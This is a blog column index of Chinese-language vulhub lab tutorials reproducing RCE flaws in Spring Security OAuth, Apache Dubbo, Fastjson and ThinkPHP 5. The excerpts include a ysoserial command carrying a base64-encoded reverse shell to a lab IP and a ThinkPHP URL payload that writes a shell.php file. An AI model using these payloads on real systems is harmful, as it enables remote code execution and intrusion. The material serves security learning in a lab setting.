![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
vulhub漏洞复现
文章平均质量分 87
徐长卿学网安
这个人不懒,但懒得写垃圾文章,只写精品.
展开
-
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.原创 2023-09-02 15:02:27 · 993 阅读 · 1 评论 -
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。原创 2023-08-25 20:26:35 · 912 阅读 · 1 评论 -
Fastjson<=1.2.47-RCE反序列化漏洞(CNVD‐2019‐22238)保姆级教程
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也 就是通常所指的“Gadget”),则会造成一些严重的安全问题。原创 2023-08-10 23:26:34 · 483 阅读 · 3 评论 -
thinkphp 5-rce版本漏洞复现(超详细版)
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。原创 2023-08-06 17:19:26 · 6889 阅读 · 2 评论